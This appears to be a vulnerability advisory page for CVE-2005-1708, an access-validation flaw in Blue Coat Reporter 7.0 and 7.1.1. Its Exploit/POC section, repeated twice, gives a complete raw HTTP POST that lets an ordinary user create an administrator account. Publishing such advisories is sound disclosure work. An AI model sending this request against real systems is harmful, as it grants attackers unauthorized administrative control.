Blue Coat Reporter Remote Privilege Escalation Vulnerability
BID:13723
Info
Blue Coat Reporter Remote Privilege Escalation Vulnerability
| Bugtraq ID: | 13723 |
| Class: | Access Validation Error |
| CVE: |
CVE-2005-1708 |
| Remote: | Yes |
| Local: | No |
| Published: | May 24 2005 12:00AM |
| Updated: | Jul 12 2009 02:56PM |
| Credit: | "Oliver Karow" <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: |
Blue Coat Systems Blue Coat Reporter 7.1.1 .1 Blue Coat Systems Blue Coat Reporter 7.0 |
| Not Vulnerable: |
Blue Coat Systems Blue Coat Reporter 7.1.2 |
Discussion
Blue Coat Reporter Remote Privilege Escalation Vulnerability
Blue Coat Reporter is prone to a remote privilege escalation vulnerability. This issue is due to a failure in the application to properly authenticate a user prior to permitting access to administrator functions.
A remote authenticated user can manipulate the form for adding new users and create a new user with administrator access.
The vendor has addressed this issue in the upcoming version 7.1.2 of the application.
Blue Coat Reporter is prone to a remote privilege escalation vulnerability. This issue is due to a failure in the application to properly authenticate a user prior to permitting access to administrator functions.
A remote authenticated user can manipulate the form for adding new users and create a new user with administrator access.
The vendor has addressed this issue in the upcoming version 7.1.2 of the application.
Exploit / POC
Blue Coat Reporter Remote Privilege Escalation Vulnerability
No exploit is required.
The following proof of concept is available using the user account test:
POST /?dp+templates.admin.users.user_form_processing HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://www.example.com:8987/?dp+templates.admin.users.user_form+volatile.form_type+new
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com:8987
Pragma: no-cache
Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test;
authpassword7=098f6bcd4621d373cade4e832627b4f6
Content-Length: 170
submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.
user.profiles.0=profile1&volatile.form_type=new
No exploit is required.
The following proof of concept is available using the user account test:
POST /?dp+templates.admin.users.user_form_processing HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword,
application/x-shockwave-flash, */*
Referer:
http://www.example.com:8987/?dp+templates.admin.users.user_form+volatile.form_type+new
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.example.com:8987
Pragma: no-cache
Cookie: session_id=d9430f0d59eb43871e2c38ab84627232; authusername7=test;
authpassword7=098f6bcd4621d373cade4e832627b4f6
Content-Length: 170
submit=Save+and+Close&volatile.user.username=hurz&volatile.user.password=hurz&volatile.user.administrator=true&volatile.
user.profiles.0=profile1&volatile.form_type=new
Solution / Fix
Blue Coat Reporter Remote Privilege Escalation Vulnerability
Solution:
The vendor has addressed this issue in the upcoming version 7.1.2 of the application.
Solution:
The vendor has addressed this issue in the upcoming version 7.1.2 of the application.
References
Blue Coat Reporter Remote Privilege Escalation Vulnerability
References:
References:
- Blue Coat Reporter Homepage (Blue Coat Systems)
- Blue Coat Systems Homepage (Blue Coat Systems)
- Security Advisory: Blue Coat Reporter Vulnerabilities (Blue Coat Systems)
- Blue Coat Reporter multiple remote vulnerabilities ("Oliver Karow"
)